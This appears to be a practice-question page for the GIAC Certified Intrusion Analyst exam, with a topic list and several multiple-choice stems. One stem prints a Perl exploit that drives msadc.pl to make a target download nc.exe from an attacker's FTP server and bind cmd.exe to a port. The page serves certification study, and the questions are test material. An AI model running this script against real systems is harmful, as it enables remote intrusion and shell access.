Free Preparation Discussions
MENU
GIAC Certified Intrusion Analyst Exam
- Topic 1: Demonstrate an understanding of how DNS works for both legitimate and malicious purposes/ IDS Fundamentals and Network Architecture
- Topic 2: Demonstrate knowledge relating to packet crafting and manipulation/ Demonstrate understanding of the TCP/IP communications model and link layer operations
- Topic 3: Demonstrate competence in analyzing data from multiple sources as part of a forensic investigation/ Demonstrate ability to craft tcpdump filters that match on given criteria
- Topic 4: Demonstrate the ability to analyze network and application traffic to identify both normal and malicious behaviors/ Demonstrate an understanding of IDS tuning methods and correlation issues
- Topic 5: Demonstrate knowledge and skill relating to application layer protocol dissection and analysis/ How to identify fragmentation and fragmentation-based attacks in packet captures
- Topic 6: Demonstrate knowledge of fundamental IDS concepts, such as network architecture options/ Demonstrate understanding of how fragmentation works
- Topic 7: Demonstrate an understanding of SiLK and other tools to perform network traffic and flow analysis/ Create effective IDS rules to detect varied types of malicious activity
- Topic 8: Demonstrate understanding of the UDP and ICMP protocols and the ability to discern between typical and anomalous behavior/ Advanced Analysis and Network Forensics
Free GIAC GIAC Certified Intrusion Analyst Exam Actual Questions
The questions for GIAC Certified Intrusion Analyst were last updated On Apr. 10, 2024
Which of the following tools is described below?
It is a set of tools that are used for sniffing passwords, e-mail, and HTTP traffic. Some of its tools include arpredirect, macof, tcpkill, tcpnice, filesnarf, and mailsnarf. It is highly effective for sniffing both switched and shared networks. It uses the arpredirect and macof tools for switching across switched networks. It can also be used to capture authentication information for FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc.
Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h
$host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system
("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl
msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get
hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is
downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is
finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
Which of the following algorithms is used as a default algorithm for ESP extension header in IPv6?
Which of the following methods is used by forensic investigators to acquire an image over the network in a secure manner?
- Select Question Types you want
- Set your Desired Pass Percentage
- Allocate Time (Hours : Minutes)
- Create Multiple Practice tests with Limited Questions
- Customer Support
Currently there are no comments in this discussion, be the first to comment!